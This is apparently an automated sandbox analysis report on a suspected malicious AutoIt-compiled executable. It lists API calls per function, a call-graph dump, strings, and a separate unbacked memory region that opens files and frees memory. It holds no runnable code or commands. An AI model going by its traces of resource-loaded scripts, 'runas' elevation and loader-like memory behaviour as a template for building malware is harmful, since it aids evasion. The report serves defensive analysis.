PeekMessageW 98123->98132 98124 8edb73 TranslateMessage DispatchMessageW 98124->98123 98125 8edbaf Sleep 98143 8edbc0 98125->98143 98126 932b74 Sleep 98126->98143 98127 8fe551 timeGetTime 98127->98143 98128 931dda timeGetTime 98183 8fe300 23 API calls 98128->98183 98131 932c0b GetExitCodeProcess 98135 932c21 WaitForSingleObject 98131->98135 98136 932c37 CloseHandle 98131->98136 98132->98118 98132->98119 98132->98121 98132->98122 98132->98123 98132->98124 98132->98125 98132->98126 98132->98128 98137 8ed9d5 98132->98137 98145 8eec40 235 API calls 98132->98145 98146 8f1310 235 API calls 98132->98146 98147 8ebf40 235 API calls 98132->98147 98149 8edfd0 98132->98149 98177 8fedf6 98132->98177 98182 8edd50 235 API calls 98132->98182 98184 953a2a 23 API calls 98132->98184 98185 95359c 82 API calls __wsopen_s 98132->98185 98133 9729bf GetForegroundWindow 98133->98143 98135->98132 98135->98136 98136->98143 98138 932a31 98138->98137 98139 932ca9 Sleep 98139->98132 
98143->98127 98143->98131 98143->98132 98143->98133 98143->98137 98143->98138 98143->98139 98186 965658 23 API calls 98143->98186 98187 94e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98143->98187 98188 94d4dc 47 API calls 98143->98188 98145->98132 98146->98132 98147->98132 98150 8ee010 98149->98150 98151 932f7a 98150->98151 98154 8ee075 98150->98154 98152 8eec40 235 API calls 98151->98152 98153 932f8c 98152->98153 98166 8ee0dc messages 98153->98166 98191 95359c 82 API calls __wsopen_s 98153->98191 98154->98166 98192 900242 5 API calls __Init_thread_wait 98154->98192 98158 932fca 98160 8ea961 22 API calls 98158->98160 98158->98166 98159 8ea961 22 API calls 98159->98166 98163 932fe4 98160->98163 98193 9000a3 29 API calls __onexit 98163->98193 98166->98159 98168 8eec40 235 API calls 98166->98168 98171 8ea8c7 22 API calls 98166->98171 98172 8f04f0 22 API calls 98166->98172 98173 95359c 82 API calls 98166->98173 98174 8ee3e1 98166->98174 98189 8ea81b 41 API calls 98166->98189 98190 8fa308 235 API calls 98166->98190 98195 900242 5 API calls __Init_thread_wait 98166->98195 98196 9000a3 29 API calls __onexit 98166->98196 98197 9001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98166->98197 98198 9647d4 235 API calls 98166->98198 98199 9668c1 235 API calls 98166->98199 98167 932fee 98194 9001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98167->98194 98168->98166 98171->98166 98172->98166 98173->98166 98174->98132 98178 8fee09 98177->98178 98179 8fee12 98177->98179 98178->98132 98179->98178 98180 8fee36 IsDialogMessageW 98179->98180 98181 93efaf GetClassLongW 98179->98181 98180->98178 98180->98179 98181->98179 98181->98180 98182->98132 98183->98132 98184->98132 98185->98132 98186->98143 98187->98143 98188->98143 98189->98166 98190->98166 98191->98166 98192->98158 98193->98167 98194->98166 98195->98166 98196->98166 98197->98166 98198->98166 98199->98166 98200 918402 98205 9181be 98200->98205 
98204 91842a 98210 9181ef try_get_first_available_module 98205->98210 98207 9183ee 98224 9127ec 26 API calls pre_c_initialization 98207->98224 98209 918343 98209->98204 98217 920984 98209->98217 98213 918338 98210->98213 98220 908e0b 40 API calls 2 library calls 98210->98220 98212 91838c 98212->98213 98221 908e0b 40 API calls 2 library calls 98212->98221 98213->98209 98223 90f2d9 20 API calls __dosmaperr 98213->98223 98215 9183ab 98215->98213 98222 908e0b 40 API calls 2 library calls 98215->98222 98225 920081 98217->98225 98219 92099f 98219->98204 98220->98212 98221->98215 98222->98213 98223->98207 98224->98209 98228 92008d ___BuildCatchObject 98225->98228 98226 92009b 98282 90f2d9 20 API calls __dosmaperr 98226->98282 98228->98226 98230 9200d4 98228->98230 98229 9200a0 98283 9127ec 26 API calls pre_c_initialization 98229->98283 98236 92065b 98230->98236 98235 9200aa __fread_nolock 98235->98219 98237 920678 98236->98237 98238 9206a6 98237->98238 98239 92068d 98237->98239 98285 915221 98238->98285 98299 90f2c6 20 API calls __dosmaperr 98239->98299 98242 9206ab 98243 9206b4 98242->98243 98244 9206cb 98242->98244 98301 90f2c6 20 API calls __dosmaperr 98243->98301 98298 92039a CreateFileW 98244->98298 98248 9206b9 98302 90f2d9 20 API calls __dosmaperr 98248->98302 98249 9200f8 98284 920121 LeaveCriticalSection __wsopen_s 98249->98284 98251 920781 GetFileType 98253 9207d3 98251->98253 98254 92078c GetLastError 98251->98254 98252 920704 98252->98251 98256 920756 GetLastError 98252->98256 98303 92039a CreateFileW 98252->98303 98307 91516a 21 API calls 2 library calls 98253->98307 98305 90f2a3 20 API calls __dosmaperr 98254->98305 98255 920692 98300 90f2d9 20 API calls __dosmaperr 98255->98300 98304 90f2a3 20 API calls __dosmaperr 98256->98304 98259 92079a CloseHandle 98259->98255 98261 9207c3 98259->98261 98306 90f2d9 20 API calls __dosmaperr 98261->98306 98263 920749 98263->98251 98263->98256 98265 9207f4 98267 920840 98265->98267 98308 9205ab 72 API calls 3 library 

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 008E430D
                                                                      • Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A
                                                                    • GetCurrentProcess.KERNEL32(?,0097CB64,00000000,?,?), ref: 008E4422
                                                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 008E4429
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 008E4454
                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 008E4466
                                                                    • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 008E4474
                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 008E447B
                                                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 008E44A0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                    • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                    • API String ID: 3290436268-3101561225
                                                                    • Opcode ID: b6c6e08a9c2c21f0e56a03c305565724206e58cb6f9309d4abc579037f9f06d2
                                                                    • Instruction ID: 8b9d0b73634e9a2dae175b204fd3060636daca614b9bb1f12b6a88ae64ac4ea0
                                                                    • Opcode Fuzzy Hash: b6c6e08a9c2c21f0e56a03c305565724206e58cb6f9309d4abc579037f9f06d2
                                                                    • Instruction Fuzzy Hash: 9CA1386293E3D4CFCB11C7797E611993FE8BB23324B8896ACE045D3B65F2240544EB25

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,008E50AA,?,?,00000000,00000000), ref: 008E42B2
                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008E50AA,?,?,00000000,00000000), ref: 008E42C9
                                                                    • LoadResource.KERNEL32(?,00000000,?,?,008E50AA,?,?,00000000,00000000,?,?,?,?,?,?,008E4F20), ref: 009235BE
                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,008E50AA,?,?,00000000,00000000,?,?,?,?,?,?,008E4F20), ref: 009235D3
                                                                    • LockResource.KERNEL32(008E50AA,?,?,008E50AA,?,?,00000000,00000000,?,?,?,?,?,?,008E4F20,?), ref: 009235E6
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                    • String ID: SCRIPT
                                                                    • API String ID: 3051347437-3967369404
                                                                    • Opcode ID: 15b357c303f6fee8be88a3c7a20a76786c0ccee08f45a49234efe3b1c0df2225
                                                                    • Instruction ID: 590c1de4852fdfe1458c5ed16eb2fdb8e6ac4c7853d34a2e057876c0959eacdc
                                                                    • Opcode Fuzzy Hash: 15b357c303f6fee8be88a3c7a20a76786c0ccee08f45a49234efe3b1c0df2225
                                                                    • Instruction Fuzzy Hash: 67117CB1200701BFD7218B66DC48F677BB9EBC6B51F14816DB51AD6260DBB2D8409620

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 008E2B6B
                                                                      • Part of subcall function 008E3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009B1418,?,008E2E7F,?,?,?,00000000), ref: 008E3A78
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                    • GetForegroundWindow.USER32(runas,?,?,?,?,?,009A2224), ref: 00922C10
                                                                    • ShellExecuteW.SHELL32(00000000,?,?,009A2224), ref: 00922C17
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                    • String ID: runas
                                                                    • API String ID: 448630720-4000483414
                                                                    • Opcode ID: 6be2afdb4a999b44c8bba506016fa8d1a11c15799720dd83d882eb9f089a16fd
                                                                    • Instruction ID: d6d2c85ba532d3c0591ee8d83147d0cabd1a42942c63eadf50503f760bbb7c86
                                                                    • Opcode Fuzzy Hash: 6be2afdb4a999b44c8bba506016fa8d1a11c15799720dd83d882eb9f089a16fd
                                                                    • Instruction Fuzzy Hash: 7811D231208381AAC714FF2AE8559AE77A9FBD3760F84042CF086931B2DF208A499753
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,00925222), ref: 0094DBCE
                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 0094DBDD
                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 0094DBEE
                                                                    • FindClose.KERNEL32(00000000), ref: 0094DBFA
                                                                    Similarity
                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                    • String ID:
                                                                    • API String ID: 2695905019-0
                                                                    • Opcode ID: d1996a6f6cd9909c90a15a28f04fb7335d7b259b423898e3be31ef7f940fefd9
                                                                    • Instruction ID: ea371f120befd5f862a0426e6c7c35ae878b0ae6b200ab34c321be242d06b6e7
                                                                    • Opcode Fuzzy Hash: d1996a6f6cd9909c90a15a28f04fb7335d7b259b423898e3be31ef7f940fefd9
                                                                    • Instruction Fuzzy Hash: BCF023714295105782216FBCDC4DC6A376C9F02339B504716F479C10F0EBB09DD4D6D5
                                                                    APIs
                                                                    • GetInputState.USER32 ref: 008ED807
                                                                    • timeGetTime.WINMM ref: 008EDA07
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008EDB28
                                                                    • TranslateMessage.USER32(?), ref: 008EDB7B
                                                                    • DispatchMessageW.USER32(?), ref: 008EDB89
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008EDB9F
                                                                    • Sleep.KERNEL32(0000000A), ref: 008EDBB1
                                                                    Similarity
                                                                    • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                    • String ID:
                                                                    • API String ID: 2189390790-0
                                                                    • Opcode ID: 0c3f2acc7ddb77de14f51a5b5125cfed35bd8f4dce76f89d26668fedd4d8cb7a
                                                                    • Instruction ID: 606a4f97238b29dd2b4339b2846161f1523580555396fbf6b47f8476b19d9345
                                                                    • Opcode Fuzzy Hash: 0c3f2acc7ddb77de14f51a5b5125cfed35bd8f4dce76f89d26668fedd4d8cb7a
                                                                    • Instruction Fuzzy Hash: 2542C070608385AFD728DF25C844B6ABBE4FF86314F14862DE595CB292D774E848DF82

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 008E2D07
                                                                    • RegisterClassExW.USER32(00000030), ref: 008E2D31
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008E2D42
                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 008E2D5F
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008E2D6F
                                                                    • LoadIconW.USER32(000000A9), ref: 008E2D85
                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008E2D94
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                    • API String ID: 2914291525-1005189915
                                                                    • Opcode ID: 84bd0ba942810d32877fe66d4df557deba8be7217076e6e9bb714000d892588b
                                                                    • Instruction ID: 942c88f49fb453c701acbbc8653048d6ad21f8bf8af2fc02d832067247881dd9
                                                                    • Opcode Fuzzy Hash: 84bd0ba942810d32877fe66d4df557deba8be7217076e6e9bb714000d892588b
                                                                    • Instruction Fuzzy Hash: C62124B2925348AFDB00DFA4ED59BDDBBB4FB08711F00821AF615A62A0D7B00584EF90

                                                                    Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed; first basic block 92065b-92068b)
                                                                    APIs
                                                                      • Part of subcall function 0092039A: CreateFileW.KERNELBASE(00000000,00000000,?,00920704,?,?,00000000,?,00920704,00000000,0000000C), ref: 009203B7
                                                                    • GetLastError.KERNEL32 ref: 0092076F
                                                                    • __dosmaperr.LIBCMT ref: 00920776
                                                                    • GetFileType.KERNELBASE(00000000), ref: 00920782
                                                                    • GetLastError.KERNEL32 ref: 0092078C
                                                                    • __dosmaperr.LIBCMT ref: 00920795
                                                                    • CloseHandle.KERNEL32(00000000), ref: 009207B5
                                                                    • CloseHandle.KERNEL32(?), ref: 009208FF
                                                                    • GetLastError.KERNEL32 ref: 00920931
                                                                    • __dosmaperr.LIBCMT ref: 00920938
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                    • String ID: H
                                                                    • API String ID: 4237864984-2852464175
                                                                    • Opcode ID: 3099861adfad2524f7d0324181fb61fc7d755f688709e6821afeb760b9572a5a
                                                                    • Instruction ID: d3af1514111fb37a028cea2d529a03655bb4e0ef0baac0ec9ad1ac26d435c06e
                                                                    • Opcode Fuzzy Hash: 3099861adfad2524f7d0324181fb61fc7d755f688709e6821afeb760b9572a5a
                                                                    • Instruction Fuzzy Hash: 7EA14632A141188FDF19EF68EC51BAE3BA4AB86320F14025DF8159B3D2D7319D53DB91

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 008E3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009B1418,?,008E2E7F,?,?,?,00000000), ref: 008E3A78
                                                                      • Part of subcall function 008E3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008E3379
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008E356A
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0092318D
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009231CE
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00923210
                                                                    • _wcslen.LIBCMT ref: 00923277
                                                                    • _wcslen.LIBCMT ref: 00923286
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                    • API String ID: 98802146-2727554177
                                                                    • Opcode ID: 6f5cbc7eec342a32e8439cd8a4a65b21af86e18e44058f290de23f28d47a20d9
                                                                    • Instruction ID: 9f3d67021182b9fc4cf99519f472f2421a1779927b8b7a5d164beca65aa40188
                                                                    • Opcode Fuzzy Hash: 6f5cbc7eec342a32e8439cd8a4a65b21af86e18e44058f290de23f28d47a20d9
                                                                    • Instruction Fuzzy Hash: 9071F3714183009FC314EF29ED8596BBBE8FF86B50F404A2EF555C71A0EB349A48CB62

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 008E2B8E
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 008E2B9D
                                                                    • LoadIconW.USER32(00000063), ref: 008E2BB3
                                                                    • LoadIconW.USER32(000000A4), ref: 008E2BC5
                                                                    • LoadIconW.USER32(000000A2), ref: 008E2BD7
                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008E2BEF
                                                                    • RegisterClassExW.USER32(?), ref: 008E2C40
                                                                      • Part of subcall function 008E2CD4: GetSysColorBrush.USER32(0000000F), ref: 008E2D07
                                                                      • Part of subcall function 008E2CD4: RegisterClassExW.USER32(00000030), ref: 008E2D31
                                                                      • Part of subcall function 008E2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008E2D42
                                                                      • Part of subcall function 008E2CD4: InitCommonControlsEx.COMCTL32(?), ref: 008E2D5F
                                                                      • Part of subcall function 008E2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008E2D6F
                                                                      • Part of subcall function 008E2CD4: LoadIconW.USER32(000000A9), ref: 008E2D85
                                                                      • Part of subcall function 008E2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008E2D94
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                    • String ID: #$0$AutoIt v3
                                                                    • API String ID: 423443420-4155596026
                                                                    • Opcode ID: 02c18ddbf7a77d5e1e5a9b13ceaf9124a8c649b26283ab428a54dded4441d813
                                                                    • Instruction ID: 2091659c7797e0a9ca701049402cba64085626fc5782115fc8cf22f34a2e36a1
                                                                    • Opcode Fuzzy Hash: 02c18ddbf7a77d5e1e5a9b13ceaf9124a8c649b26283ab428a54dded4441d813
                                                                    • Instruction Fuzzy Hash: 632150B2E28354AFDB109FA5ED65B9D7FF4FB08B60F50011AF504A66A0E7B10540EF90

                                                                    Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed; first basic block 8e3170-8e3185)
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,008E316A,?,?), ref: 008E31D8
                                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,008E316A,?,?), ref: 008E3204
                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008E3227
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,008E316A,?,?), ref: 008E3232
                                                                    • CreatePopupMenu.USER32 ref: 008E3246
                                                                    • PostQuitMessage.USER32(00000000), ref: 008E3267
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                    • String ID: TaskbarCreated
                                                                    • API String ID: 129472671-2362178303
                                                                    • Opcode ID: 5f172ea2d768d8073740e7fa9d80ca0c702c01c6ee9597798a5e84b0f1037fcc
                                                                    • Instruction ID: 43001c6661ee0fb79b3c2dca610f06b8dac180e24d1d92eaf9c5af852f09858d
                                                                    • Opcode Fuzzy Hash: 5f172ea2d768d8073740e7fa9d80ca0c702c01c6ee9597798a5e84b0f1037fcc
                                                                    • Instruction Fuzzy Hash: 78419C31228284B7DB291B39AE1DBB93659F747355F44022DF646C72A1DB70CE40A762

                                                                    Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed; first basic block be1d98-be1e46)
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00BE1E69
                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00BE208F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743712764.0000000000BDF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BDF000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bdf000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileFreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 204039940-0
                                                                    • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                    • Instruction ID: b2e8d152aa520e450851ea668f83595049d767fb9e37855240a2c23f594d1c58
                                                                    • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                    • Instruction Fuzzy Hash: B4A13870E00249EBDB14CFA5C994BEEBBB5FF48305F208599E501BB281D7759A40DFA4

                                                                    Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed; single basic block 8e2c63-8e2cd3 calling CreateWindowExW twice and ShowWindow twice)
                                                                    APIs
                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008E2C91
                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008E2CB2
                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,008E1CAD,?), ref: 008E2CC6
                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,008E1CAD,?), ref: 008E2CCF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CreateShow
                                                                    • String ID: AutoIt v3$edit
                                                                    • API String ID: 1584632944-3779509399
                                                                    • Opcode ID: 36115414f1aedd1dba3c5a2729b77aa5b5e4ebda1e4cbf6e0d7cd52b17d6dd7a
                                                                    • Instruction ID: 15c70c90bf6f24a7f16b94de93a170a7267747b000f2fc078c7a79d1d03c726c
                                                                    • Opcode Fuzzy Hash: 36115414f1aedd1dba3c5a2729b77aa5b5e4ebda1e4cbf6e0d7cd52b17d6dd7a
                                                                    • Instruction Fuzzy Hash: DFF03AB66642907AEB300723AC18E772EFDD7C6F60F54411EFA04A21A0E6610840EBB0

                                                                    Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed; first basic block be1b78-be1c9a calling bdf7c8, be1a68 and CreateFileW)
                                                                    APIs
                                                                      • Part of subcall function 00BE1A68: Sleep.KERNELBASE(000001F4), ref: 00BE1A79
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00BE1C90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743712764.0000000000BDF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BDF000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bdf000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileSleep
                                                                    • String ID: TDJ7APUKN2M80O6O
                                                                    • API String ID: 2694422964-1287426209
                                                                    • Opcode ID: 32a7b62362b34236eac4e9162016ea36e6b0590fd14612d413ea53ddb0a7d0d9
                                                                    • Instruction ID: 14c4b03924bbf3f21e08c9fca2adb49463d9051d59dac05d05fa110cf777c9db
                                                                    • Opcode Fuzzy Hash: 32a7b62362b34236eac4e9162016ea36e6b0590fd14612d413ea53ddb0a7d0d9
                                                                    • Instruction Fuzzy Hash: D4519230D04289EBEF11DBE8C854BEEBBB9AF14300F104599E208BB2C0D7B90B45CB65

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00952C05
                                                                    • DeleteFileW.KERNEL32(?), ref: 00952C87
                                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00952C9D
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00952CAE
                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00952CC0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: File$Delete$Copy
                                                                    • String ID:
                                                                    • API String ID: 3226157194-0
                                                                    • Opcode ID: 1ba340b528fb467fe2dd5faf346200962dd815d143ffd18325647f746b167310
